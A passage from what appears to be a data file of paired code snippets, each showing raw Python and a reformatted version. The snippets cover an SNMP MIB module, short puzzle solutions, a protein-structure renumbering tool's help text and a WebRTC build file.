if mibBuilder.loadTexts:
sysConfigFlashCopyStatus.setStatus('mandatory')
sys_config_internal_flash_image_version = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 15, 3), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysConfigInternalFlashImageVersion.setStatus('mandatory')
sys_config_pcmcia_flash_image_version = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 15, 4), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysConfigPCMCIAFlashImageVersion.setStatus('mandatory')
mibinternet_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 1))
mibframe_relay_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 2))
mibanswer_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 3))
mibd_s3_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 4))
mibuds3_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 5))
mibcadsl_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 6))
mibdadsl_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 7))
mibsdsl_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 8))
mibvdsl_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 9))
mibdmt_al_dsl_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 10))
miboc3_atm_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 11))
miblim_sparing_config_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 12))
mibds3_atm_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 13))
mibhdsl2_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 14))
mibe3_atm_network_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 15))
mibredundancy_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 16))
mibredundancy_stats_profile = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23, 17))
mibBuilder.exportSymbols('ASCEND-MIB', mibe3AtmNetworkProfile=mibe3AtmNetworkProfile, atmpGroup=atmpGroup, hostTypeQuad=hostTypeQuad, dslPipeSdslCoe=dslPipeSdslCoe, consoleType=consoleType, mibdS3NetworkProfile=mibdS3NetworkProfile, callStatusGroup=callStatusGroup, doBegEndRemoteLB=doBegEndRemoteLB, sysSPROMCountries1=sysSPROMCountries1, consoleEntry=consoleEntry, doEntry=doEntry, max=max, pipe50LS56=pipe50LS56, consoleNumber=consoleNumber, sysSecsSinceStartup=sysSecsSinceStartup, sysConfigTftp=sysConfigTftp, sysConfigTftpFilename=sysConfigTftpFilename, dslPipe2S=dslPipe2S, max200=max200, hostStatusChannels=hostStatusChannels, max4002=max4002, voipGroup=voipGroup, max4004=max4004, mibds3AtmNetworkProfile=mibds3AtmNetworkProfile, resetStatWAN=resetStatWAN, sysConfigFlash=sysConfigFlash, fatalLogTable=fatalLogTable, hostTypeAim6=hostTypeAim6, fatalLogTableEntry=fatalLogTableEntry, pipe130T1=pipe130T1, miboc3AtmNetworkProfile=miboc3AtmNetworkProfile, console=console, pipe130N56=pipe130N56, sparingGroup=sparingGroup, doSlotIndex=doSlotIndex, fatalLogAbsoluteTime=fatalLogAbsoluteTime, mibanswerProfile=mibanswerProfile, mibdadslNetworkProfile=mibdadslNetworkProfile, consoleTable=consoleTable, hostStatusDialNum=hostStatusDialNum, slots=slots, mibvdslNetworkProfile=mibvdslNetworkProfile, flashGroup=flashGroup, lanTypeAny=lanTypeAny, consoleIndex=consoleIndex, sysReset=sysReset, fatalLogIndex=fatalLogIndex, configuration=configuration, max_tnt=max_tnt, lanTypeEtherData=lanTypeEtherData, consoleIf=consoleIf, hostStatus=hostStatus, multiShelf=multiShelf, sysConfigFlashCmd=sysConfigFlashCmd, max3000=max3000, doExtendBW=doExtendBW, pipe400=pipe400, mgGroup=mgGroup, sysSPROMOptions2=sysSPROMOptions2, sysLastRestartReason=sysLastRestartReason, fatalLogSoftwareVerion=fatalLogSoftwareVerion, advancedAgent=advancedAgent, apx_8000=apx_8000, pipeline=pipeline, hostStatusCallMgm=hostStatusCallMgm, cltmGroup=cltmGroup, DisplayString=DisplayString, fatalLogReason=fatalLogReason, dslPipeS=dslPipeS, systemStatusGroup=systemStatusGroup, hostStatusSlotIndex=hostStatusSlotIndex, hostStatusItemIndex=hostStatusItemIndex, lanModemGroup=lanModemGroup, doResynchronize=doResynchronize, hostStatusDataSvc=hostStatusDataSvc, sysConfigTftpStatus=sysConfigTftpStatus, pipe85=pipe85, cvmax100=cvmax100, dslPipeAdslCoeC=dslPipeAdslCoeC, hostTypeAim2=hostTypeAim2, hostStatusLocalName=hostStatusLocalName, mibredundancyStatsProfile=mibredundancyStatsProfile, products=products, asgGroup=asgGroup, dslTnt=dslTnt, firewallGroup=firewallGroup, doItemIndex=doItemIndex, hostStatusTable=hostStatusTable, sysAuthPreference=sysAuthPreference, sysConfigInternalFlashImageVersion=sysConfigInternalFlashImageVersion, sysSPROMSerialNumber=sysSPROMSerialNumber, dslmax20=dslmax20, mibsdslNetworkProfile=mibsdslNetworkProfile, stinger_10=stinger_10, sysConfigTftpParameter=sysConfigTftpParameter, terminator=terminator, hostStatusDuration=hostStatusDuration, max1800=max1800, doContractBW=doContractBW, wanDialoutPkt=wanDialoutPkt, powerSupply=powerSupply, resetStatEther=resetStatEther, pipe25Fx=pipe25Fx, lanTypeEthernet=lanTypeEthernet, aqueduct=aqueduct, miblimSparingConfigProfile=miblimSparingConfigProfile, doHangUp=doHangUp, consoleSecurity=consoleSecurity, dslPipeAdmt=dslPipeAdmt, sessionStatusGroup=sessionStatusGroup, sysConfigPCMCIAFlashImageVersion=sysConfigPCMCIAFlashImageVersion, sysLoadName=sysLoadName, max4000=max4000, pipe220=pipe220, resetStatAll=resetStatAll, doBegEndBERT=doBegEndBERT, miscGroup=miscGroup, pipe130V35=pipe130V35, pipe25=pipe25, dslPipeAdslCoeD=dslPipeAdslCoeD, ascend=ascend, spipe155T1=spipe155T1, pipe25Px=pipe25Px, multiband=multiband, mibhdsl2NetworkProfile=mibhdsl2NetworkProfile, mibdmtAlDslNetworkProfile=mibdmtAlDslNetworkProfile, spipe95=spipe95, resetStat=resetStat, dslPipeAlctlDmt=dslPipeAlctlDmt, sysConfigRadiusCmd=sysConfigRadiusCmd, lanTypes=lanTypes, hostStatusCallState=hostStatusCallState, sysConfigTftpPort=sysConfigTftpPort, sysConfigTftpCmd=sysConfigTftpCmd, sysConfigRadiusStatus=sysConfigRadiusStatus, sysAbsoluteStartupTime=sysAbsoluteStartupTime, fatalLogUserprofile=fatalLogUserprofile, fatalLogSlotIndex=fatalLogSlotIndex, mCastGroup=mCastGroup, max800=max800, aq300=aq300, eventGroup=eventGroup, hostTypeAny=hostTypeAny, sysMibMinorRevNum=sysMibMinorRevNum, consoleSpecific=consoleSpecific, doDial=doDial, mibinternetProfile=mibinternetProfile, mibredundancyProfile=mibredundancyProfile, dslPipeSdslCoe2S=dslPipeSdslCoe2S, fatalLogLoadName=fatalLogLoadName, sysConfigChange=sysConfigChange, srvcMgmtGroup=srvcMgmtGroup, max6000=max6000, hostStatusEntry=hostStatusEntry, sysConfigRadius=sysConfigRadius, mibuds3NetworkProfile=mibuds3NetworkProfile, max2000=max2000, pipe15=pipe15, sysSPROMOptions1=sysSPROMOptions1, radiusGroup=radiusGroup, sysSPROM=sysSPROM, hostTypes=hostTypes, sysAbsoluteCurrentTime=sysAbsoluteCurrentTime, mibcadslNetworkProfile=mibcadslNetworkProfile, doAnswer=doAnswer, sysMibVersionNum=sysMibVersionNum, hostStatusCallType=hostStatusCallType, resourcesGroup=resourcesGroup, dslPipe50SdslCell=dslPipe50SdslCell, sysConfigTftpHostAddr=sysConfigTftpHostAddr, dslPipeSdslHs=dslPipeSdslHs, fatalLogLocation=fatalLogLocation, hostStatusRemName=hostStatusRemName, doGroup=doGroup, doTable=doTable, hostTypeDual=hostTypeDual, dslPipeAcap=dslPipeAcap, mibframeRelayProfile=mibframeRelayProfile, pipe50=pipe50, callLoggingGroup=callLoggingGroup, pipe75=pipe75, sysConfigFlashCopyStatus=sysConfigFlashCopyStatus) |
def solution(A):
B = []
best_dif = 100000000000
sum = 0
for i in A:
sum += i
sum_left = 0
sum_right = sum
for i in A[:-1]:
sum_left += i
sum_right -= i
dif = abs(sum_left - sum_right)
if dif < best_dif:
best_dif = dif
return best_dif
| def solution(A):
b = []
best_dif = 100000000000
sum = 0
for i in A:
sum += i
sum_left = 0
sum_right = sum
for i in A[:-1]:
sum_left += i
sum_right -= i
dif = abs(sum_left - sum_right)
if dif < best_dif:
best_dif = dif
return best_dif |
def long_usage_messenger():
return """
PDB.py
optional arguments:
-h, --help show this help message and exit
-rftf text_file_with_PDB.tsv, --renumber_from_text_file text_file_with_PDB.tsv
This option will download and renumber specified files
usage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -mmCIF
usage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -PDB
usage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -mmCIF_assembly
usage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -PDB_assembly
usage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -all
-rfla [6dbp 3v03 2jit ...], --renumber_from_list_of_arguments [6dbp 3v03 2jit ...]
This option will download and renumber specified files
usage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF
usage $ python3 PDB.py -rfla 6dbp 3v03 2jit -PDB
usage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF_assembly
usage $ python3 PDB.py -rfla 6dbp 3v03 2jit -PDB_assembly
usage $ python3 PDB.py -rfla 6dbp 3v03 2jit -all
-dftf text_file_with_PDB.tsv, --download_from_text_file text_file_with_PDB.tsv
This option will read given input file parse by space
or tab or comma or new line and download it example
usage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -mmCIF
usage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -PDB
usage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -mmCIF_assembly
usage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -PDB_assembly
usage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -all
-dfla [6dbp 3v03 2jit ...], --download_from_list_of_arguments 6dbp 3v03 2jit ...]
This option will read given list of arguments separated by space.
Format of the list should be without any commas or quotation marks
usage $ python3 PDB.py -dfla 6dbp 3v03 2jit -mmCIF
usage $ python3 PDB.py -dfla 6dbp 3v03 2jit -PDB
usage $ python3 PDB.py -dfla 6dbp 3v03 2jit -mmCIF_assembly
usage $ python3 PDB.py -dfla 6dbp 3v03 2jit -PDB_assembly
usage $ python3 PDB.py -dfla 6dbp 3v03 2jit -all
-redb, --renumber_entire_database
This option will download and renumber entire PDB database in PDB or/and mmCIF format
usage $ python3 PDB.py -redb -mmCIF
usage $ python3 PDB.py -redb -PDB
usage $ python3 PDB.py -redb -mmCIF_assembly
usage $ python3 PDB.py -redb -PDB_assembly
usage $ python3 PDB.py -redb -all
-dall, --download_entire_database
This option will download entire mmCIF database
usage $ python3 PDB.py -dall -mmCIF
usage $ python3 PDB.py -dall -PDB
usage $ python3 PDB.py -dall -mmCIF_assembly
usage $ python3 PDB.py -dall -PDB_assembly
usage $ python3 PDB.py -dall -all
-refr, --refresh_entire_database
This option will delete outdated files and download
fresh ones. This option makes sense and only works if
you work with entire database
usage $ python3 PDB.py -refr -mmCIF
usage $ python3 PDB.py -refr -PDB
usage $ python3 PDB.py -refr -mmCIF_assembly
usage $ python3 PDB.py -refr -PDB_assembly
usage $ python3 PDB.py -refr -all
-PDB, --PDB_format_only
This option will specify working format to pdb format
-mmCIF, --mmCIF_format_only
This option will specify working format to mmCIF format (default)
-PDB_assembly, --PDB_assembly_format_only
This option will specify working format to pdb format
-mmCIF_assembly, --mmCIF_assembly_format_only
This option will specify working format to mmCIF format
-all, --all_formats This option will work with both formats
argpar.add_argument("-sipm", "--set_default_input_path_to_mmCIF", type=str, help=argparse.SUPPRESS)
argpar.add_argument("-sipma", "--set_default_input_path_to_mmCIF_assembly", type=str, help=argparse.SUPPRESS)
argpar.add_argument("-sipp", "--set_default_input_path_to_PDB", type=str, help=argparse.SUPPRESS)
argpar.add_argument("-sippa", "--set_default_input_path_to_PDB_assembly", type=str, help=argparse.SUPPRESS)
argpar.add_argument("-sips", "--set_default_input_path_to_SIFTS", type=str, help=argparse.SUPPRESS)
argpar.add_argument("-sopm", "--set_default_output_path_to_mmCIF", type=str, help=argparse.SUPPRESS)
argpar.add_argument("-sopma", "--set_default_output_path_to_mmCIF_assembly", type=str, help=argparse.SUPPRESS)
argpar.add_argument("-sopp", "--set_default_output_path_to_PDB", type=str, help=argparse.SUPPRESS)
argpar.add_argument("-soppa", "--set_default_output_path_to_PDB_assembly", type=str, help=argparse.SUPPRESS)
-sipm, --set_default_input_path_to_mmCIF
This option will set default input path to mmCIF files (default: <./mmCIF>)
usage $ python3 PDB.py -sipm /Users/bulatfaezov/PycharmProjects/renum/venv/mmCIF
-sipp, --set_default_input_path_to_PDB
This option will set default input path to PDB files (default: <./PDB>)
usage $ python3 PDB.py -sipp /Users/bulatfaezov/PycharmProjects/renum/venv/PDB
-sipma, --set_default_input_path_to_mmCIF_assembly
This option will set default input path to mmCIF_assembly files (default: <./mmCIF_assembly>)
usage $ python3 PDB.py -sipm /Users/bulatfaezov/PycharmProjects/renum/venv/mmCIF_assembly
-sippa, --set_default_input_path_to_PDB_assembly
This option will set default input path to PDB_assembly files (default: <./PDB_assembly>)
usage $ python3 PDB.py -sipp /Users/bulatfaezov/PycharmProjects/renum/venv/PDB_assembly
-sips, --set_default_input_path_to_SIFTS
This option will set default input path to SIFTS files (default: <./SIFTS>)
usage $ python3 PDB.py -sips /Users/bulatfaezov/PycharmProjects/renum/venv/SIFTS
-sopm, --set_default_output_path_to_mmCIF
This option will set default output path to mmCIF files (default: <./output_mmCIF>)
usage $ python3 PDB.py -sopm /Users/bulatfaezov/PycharmProjects/renum/venv/output_mmCIF
-sopp, --set_default_output_path_to_PDB
This option will set default output path to PDB files (default: <./output_PDB>)
usage $ python3 PDB.py -sopp /Users/bulatfaezov/PycharmProjects/renum/venv/output_PDB
-sopma, --set_default_output_path_to_mmCIF_assembly
This option will set default output path to mmCIF_assembly files (default: <./output_mmCIF_assembly>)
usage $ python3 PDB.py -sopm /Users/bulatfaezov/PycharmProjects/renum/venv/output_mmCIF_assembly
-soppa, --set_default_output_path_to_PDB_assembly
This option will set default output path to PDB_assembly files (default: <./output_PDB_assembly>)
usage $ python3 PDB.py -sopp /Users/bulatfaezov/PycharmProjects/renum/venv/output_PDB_assembly
-sdmn, --set_default_mmCIF_num
This option will set default mmCIF number which will be added to 1 to end numbering in cases
when there are no UniProt numbering (default: 50000)
usage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF -sdmn 50000
-sdpn, --set_default_PDB_num
This option will set default PDB number which will be added to 1 to end numbering in cases
when there are no UniProt numbering (default: 5000)
usage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF -sdpn 5000
"-offz", "--set_to_off_mode_gzip"
By default program will compress files with gzip this option will turn that off
(default: gzip is on)
usage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF -offz
"-nproc", "--set_number_of_processes"
By default program will use all available CPUs. User can reduce number of CPUs for PDBrenum.
In this example: only 4 CPUs will be used by the PDBrenum even if more CPUs available
(default: nproc = None)
usage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF -nproc 4
Roland Dunbrack's Lab
Fox Chase Cancer Center
Philadelphia, PA
2020
"""
| def long_usage_messenger():
return '\nPDB.py\noptional arguments:\n-h, --help show this help message and exit\n\n-rftf text_file_with_PDB.tsv, --renumber_from_text_file text_file_with_PDB.tsv\nThis option will download and renumber specified files\nusage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -mmCIF\nusage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -PDB\nusage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -mmCIF_assembly\nusage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -PDB_assembly\nusage $ python3 PDB.py -rftf text_file_with_PDB_in_it.tsv -all\n\n-rfla [6dbp 3v03 2jit ...], --renumber_from_list_of_arguments [6dbp 3v03 2jit ...]\nThis option will download and renumber specified files\nusage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF\nusage $ python3 PDB.py -rfla 6dbp 3v03 2jit -PDB\nusage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF_assembly\nusage $ python3 PDB.py -rfla 6dbp 3v03 2jit -PDB_assembly\nusage $ python3 PDB.py -rfla 6dbp 3v03 2jit -all\n\n-dftf text_file_with_PDB.tsv, --download_from_text_file text_file_with_PDB.tsv\nThis option will read given input file parse by space\nor tab or comma or new line and download it example \nusage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -mmCIF\nusage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -PDB\nusage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -mmCIF_assembly\nusage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -PDB_assembly\nusage $ python3 PDB.py -dftf text_file_with_PDB_in_it.tsv -all\n\n-dfla [6dbp 3v03 2jit ...], --download_from_list_of_arguments 6dbp 3v03 2jit ...]\nThis option will read given list of arguments separated by space. \nFormat of the list should be without any commas or quotation marks\nusage $ python3 PDB.py -dfla 6dbp 3v03 2jit -mmCIF\nusage $ python3 PDB.py -dfla 6dbp 3v03 2jit -PDB\nusage $ python3 PDB.py -dfla 6dbp 3v03 2jit -mmCIF_assembly\nusage $ python3 PDB.py -dfla 6dbp 3v03 2jit -PDB_assembly\nusage $ python3 PDB.py -dfla 6dbp 3v03 2jit -all\n\n-redb, --renumber_entire_database\nThis option will download and renumber entire PDB database in PDB or/and mmCIF format\nusage $ python3 PDB.py -redb -mmCIF\nusage $ python3 PDB.py -redb -PDB\nusage $ python3 PDB.py -redb -mmCIF_assembly\nusage $ python3 PDB.py -redb -PDB_assembly\nusage $ python3 PDB.py -redb -all \n\n-dall, --download_entire_database\nThis option will download entire mmCIF database\nusage $ python3 PDB.py -dall -mmCIF\nusage $ python3 PDB.py -dall -PDB\nusage $ python3 PDB.py -dall -mmCIF_assembly\nusage $ python3 PDB.py -dall -PDB_assembly\nusage $ python3 PDB.py -dall -all\n\n-refr, --refresh_entire_database\nThis option will delete outdated files and download\nfresh ones. This option makes sense and only works if\nyou work with entire database\nusage $ python3 PDB.py -refr -mmCIF\nusage $ python3 PDB.py -refr -PDB\nusage $ python3 PDB.py -refr -mmCIF_assembly\nusage $ python3 PDB.py -refr -PDB_assembly\nusage $ python3 PDB.py -refr -all \n\n-PDB, --PDB_format_only\nThis option will specify working format to pdb format\n-mmCIF, --mmCIF_format_only\nThis option will specify working format to mmCIF format (default)\n-PDB_assembly, --PDB_assembly_format_only\nThis option will specify working format to pdb format\n-mmCIF_assembly, --mmCIF_assembly_format_only\nThis option will specify working format to mmCIF format\n-all, --all_formats This option will work with both formats\n\nargpar.add_argument("-sipm", "--set_default_input_path_to_mmCIF", type=str, help=argparse.SUPPRESS)\nargpar.add_argument("-sipma", "--set_default_input_path_to_mmCIF_assembly", type=str, help=argparse.SUPPRESS)\nargpar.add_argument("-sipp", "--set_default_input_path_to_PDB", type=str, help=argparse.SUPPRESS)\nargpar.add_argument("-sippa", "--set_default_input_path_to_PDB_assembly", type=str, help=argparse.SUPPRESS)\nargpar.add_argument("-sips", "--set_default_input_path_to_SIFTS", type=str, help=argparse.SUPPRESS)\nargpar.add_argument("-sopm", "--set_default_output_path_to_mmCIF", type=str, help=argparse.SUPPRESS)\nargpar.add_argument("-sopma", "--set_default_output_path_to_mmCIF_assembly", type=str, help=argparse.SUPPRESS)\nargpar.add_argument("-sopp", "--set_default_output_path_to_PDB", type=str, help=argparse.SUPPRESS)\nargpar.add_argument("-soppa", "--set_default_output_path_to_PDB_assembly", type=str, help=argparse.SUPPRESS)\n\n-sipm, --set_default_input_path_to_mmCIF\nThis option will set default input path to mmCIF files (default: <./mmCIF>)\nusage $ python3 PDB.py -sipm /Users/bulatfaezov/PycharmProjects/renum/venv/mmCIF\n-sipp, --set_default_input_path_to_PDB\nThis option will set default input path to PDB files (default: <./PDB>)\nusage $ python3 PDB.py -sipp /Users/bulatfaezov/PycharmProjects/renum/venv/PDB\n-sipma, --set_default_input_path_to_mmCIF_assembly\nThis option will set default input path to mmCIF_assembly files (default: <./mmCIF_assembly>)\nusage $ python3 PDB.py -sipm /Users/bulatfaezov/PycharmProjects/renum/venv/mmCIF_assembly\n-sippa, --set_default_input_path_to_PDB_assembly\nThis option will set default input path to PDB_assembly files (default: <./PDB_assembly>)\nusage $ python3 PDB.py -sipp /Users/bulatfaezov/PycharmProjects/renum/venv/PDB_assembly\n-sips, --set_default_input_path_to_SIFTS\nThis option will set default input path to SIFTS files (default: <./SIFTS>)\nusage $ python3 PDB.py -sips /Users/bulatfaezov/PycharmProjects/renum/venv/SIFTS\n-sopm, --set_default_output_path_to_mmCIF\nThis option will set default output path to mmCIF files (default: <./output_mmCIF>)\nusage $ python3 PDB.py -sopm /Users/bulatfaezov/PycharmProjects/renum/venv/output_mmCIF\n-sopp, --set_default_output_path_to_PDB\nThis option will set default output path to PDB files (default: <./output_PDB>)\nusage $ python3 PDB.py -sopp /Users/bulatfaezov/PycharmProjects/renum/venv/output_PDB\n-sopma, --set_default_output_path_to_mmCIF_assembly\nThis option will set default output path to mmCIF_assembly files (default: <./output_mmCIF_assembly>)\nusage $ python3 PDB.py -sopm /Users/bulatfaezov/PycharmProjects/renum/venv/output_mmCIF_assembly\n-soppa, --set_default_output_path_to_PDB_assembly\nThis option will set default output path to PDB_assembly files (default: <./output_PDB_assembly>)\nusage $ python3 PDB.py -sopp /Users/bulatfaezov/PycharmProjects/renum/venv/output_PDB_assembly\n\n-sdmn, --set_default_mmCIF_num\nThis option will set default mmCIF number which will be added to 1 to end numbering in cases \nwhen there are no UniProt numbering (default: 50000)\nusage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF -sdmn 50000\n\n-sdpn, --set_default_PDB_num\nThis option will set default PDB number which will be added to 1 to end numbering in cases \nwhen there are no UniProt numbering (default: 5000)\nusage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF -sdpn 5000\n\n"-offz", "--set_to_off_mode_gzip"\nBy default program will compress files with gzip this option will turn that off\n(default: gzip is on)\nusage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF -offz\n\n"-nproc", "--set_number_of_processes"\nBy default program will use all available CPUs. User can reduce number of CPUs for PDBrenum.\nIn this example: only 4 CPUs will be used by the PDBrenum even if more CPUs available\n(default: nproc = None)\nusage $ python3 PDB.py -rfla 6dbp 3v03 2jit -mmCIF -nproc 4\n\n\nRoland Dunbrack\'s Lab\nFox Chase Cancer Center\nPhiladelphia, PA\n2020\n ' |
my_list = [1, 2.0, "three", 4]
my_tup = (1, 2.0, "three", 4)
my_set = {1, 2.0, "three", 4}
my_str = "1, 2.0, three, 4"
# Subscripting ordered datatypes
print(my_list[0]) # indexing
print(my_tup[0:2]) # slicing
print(my_str[-8:]) # negative index and slice
# Adding elements
my_list.append(5.0)
print("my_list with new element:", my_list)
# Uniqueness
my_set.add(2.0)
print("my_set didn't change:", my_set)
| my_list = [1, 2.0, 'three', 4]
my_tup = (1, 2.0, 'three', 4)
my_set = {1, 2.0, 'three', 4}
my_str = '1, 2.0, three, 4'
print(my_list[0])
print(my_tup[0:2])
print(my_str[-8:])
my_list.append(5.0)
print('my_list with new element:', my_list)
my_set.add(2.0)
print("my_set didn't change:", my_set) |
'''
nimpy module created for working with nimrod using python
Main dependencies are:
numpy
scipy
h5py
struct
os
argparse
subprocess
This module was developed for simulations run at WiPAL in
the physics department at UW-Madison. The main nimrod build
used to test features was nimuw 3.4.10, although it should
work with many others.
'''
| """
nimpy module created for working with nimrod using python
Main dependencies are:
numpy
scipy
h5py
struct
os
argparse
subprocess
This module was developed for simulations run at WiPAL in
the physics department at UW-Madison. The main nimrod build
used to test features was nimuw 3.4.10, although it should
work with many others.
""" |
TASKS = []
class Context:
def __init__(self, sources, target):
self.sources = sources
self.target = target
@property
def source(self):
return self.sources[0]
class Task:
def __init__(self, matcher, handler, phony=False):
self.matcher = matcher
self.handler = handler
self.phony = phony
def run(self, ctx):
self.handler(ctx)
| tasks = []
class Context:
def __init__(self, sources, target):
self.sources = sources
self.target = target
@property
def source(self):
return self.sources[0]
class Task:
def __init__(self, matcher, handler, phony=False):
self.matcher = matcher
self.handler = handler
self.phony = phony
def run(self, ctx):
self.handler(ctx) |
def reversort(lst):
n = len(lst)
cnt = 0
for i in range(n - 1):
j = min(range(i, n), key=lambda j: lst[j])
cnt += j - i + 1
lst[i : j + 1] = lst[i : j + 1][::-1]
return cnt
t = int(input())
for i in range(t):
input()
(*lst,) = map(int, input().split())
cnt = reversort(lst)
print(f"Case #{i+1}: {cnt}")
| def reversort(lst):
n = len(lst)
cnt = 0
for i in range(n - 1):
j = min(range(i, n), key=lambda j: lst[j])
cnt += j - i + 1
lst[i:j + 1] = lst[i:j + 1][::-1]
return cnt
t = int(input())
for i in range(t):
input()
(*lst,) = map(int, input().split())
cnt = reversort(lst)
print(f'Case #{i + 1}: {cnt}') |
greater = 0
one = int(input())
two = int(input())
three = int(input())
while inp := input():
current = int(inp)
last_sum = one + two + three
current_sum = two + three + current
if current_sum > last_sum:
greater += 1
one = two
two = three
three = current
print(greater)
| greater = 0
one = int(input())
two = int(input())
three = int(input())
while (inp := input()):
current = int(inp)
last_sum = one + two + three
current_sum = two + three + current
if current_sum > last_sum:
greater += 1
one = two
two = three
three = current
print(greater) |
# Copyright (c) 2015 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
{
'includes': [ '../build/common.gypi', ],
'conditions': [
['OS=="ios"', {
'targets': [
{
'target_name': 'rtc_api_objc',
'type': 'static_library',
'dependencies': [
'<(webrtc_root)/base/base.gyp:rtc_base_objc',
'../../talk/libjingle.gyp:libjingle_peerconnection',
],
'sources': [
'objc/RTCIceCandidate+Private.h',
'objc/RTCIceCandidate.h',
'objc/RTCIceCandidate.mm',
'objc/RTCIceServer+Private.h',
'objc/RTCIceServer.h',
'objc/RTCIceServer.mm',
'objc/RTCMediaConstraints+Private.h',
'objc/RTCMediaConstraints.h',
'objc/RTCMediaConstraints.mm',
'objc/RTCMediaSource+Private.h',
'objc/RTCMediaSource.h',
'objc/RTCMediaSource.mm',
'objc/RTCMediaStreamTrack+Private.h',
'objc/RTCMediaStreamTrack.h',
'objc/RTCMediaStreamTrack.mm',
'objc/RTCOpenGLVideoRenderer.h',
'objc/RTCOpenGLVideoRenderer.mm',
'objc/RTCSessionDescription+Private.h',
'objc/RTCSessionDescription.h',
'objc/RTCSessionDescription.mm',
'objc/RTCStatsReport+Private.h',
'objc/RTCStatsReport.h',
'objc/RTCStatsReport.mm',
'objc/RTCVideoFrame+Private.h',
'objc/RTCVideoFrame.h',
'objc/RTCVideoFrame.mm',
'objc/RTCVideoRenderer.h',
],
'conditions': [
['OS=="ios"', {
'sources': [
'objc/RTCEAGLVideoView.h',
'objc/RTCEAGLVideoView.m',
],
'all_dependent_settings': {
'xcode_settings': {
'OTHER_LDFLAGS': [
'-framework CoreGraphics',
'-framework GLKit',
'-framework OpenGLES',
'-framework QuartzCore',
]
}
}
}],
['OS=="mac"', {
'sources': [
'objc/RTCNSGLVideoView.h',
'objc/RTCNSGLVideoView.m',
],
}],
],
'xcode_settings': {
'CLANG_ENABLE_OBJC_ARC': 'YES',
'CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS': 'YES',
'GCC_PREFIX_HEADER': 'objc/WebRTC-Prefix.pch',
},
}
],
}], # OS=="ios"
],
}
| {'includes': ['../build/common.gypi'], 'conditions': [['OS=="ios"', {'targets': [{'target_name': 'rtc_api_objc', 'type': 'static_library', 'dependencies': ['<(webrtc_root)/base/base.gyp:rtc_base_objc', '../../talk/libjingle.gyp:libjingle_peerconnection'], 'sources': ['objc/RTCIceCandidate+Private.h', 'objc/RTCIceCandidate.h', 'objc/RTCIceCandidate.mm', 'objc/RTCIceServer+Private.h', 'objc/RTCIceServer.h', 'objc/RTCIceServer.mm', 'objc/RTCMediaConstraints+Private.h', 'objc/RTCMediaConstraints.h', 'objc/RTCMediaConstraints.mm', 'objc/RTCMediaSource+Private.h', 'objc/RTCMediaSource.h', 'objc/RTCMediaSource.mm', 'objc/RTCMediaStreamTrack+Private.h', 'objc/RTCMediaStreamTrack.h', 'objc/RTCMediaStreamTrack.mm', 'objc/RTCOpenGLVideoRenderer.h', 'objc/RTCOpenGLVideoRenderer.mm', 'objc/RTCSessionDescription+Private.h', 'objc/RTCSessionDescription.h', 'objc/RTCSessionDescription.mm', 'objc/RTCStatsReport+Private.h', 'objc/RTCStatsReport.h', 'objc/RTCStatsReport.mm', 'objc/RTCVideoFrame+Private.h', 'objc/RTCVideoFrame.h', 'objc/RTCVideoFrame.mm', 'objc/RTCVideoRenderer.h'], 'conditions': [['OS=="ios"', {'sources': ['objc/RTCEAGLVideoView.h', 'objc/RTCEAGLVideoView.m'], 'all_dependent_settings': {'xcode_settings': {'OTHER_LDFLAGS': ['-framework CoreGraphics', 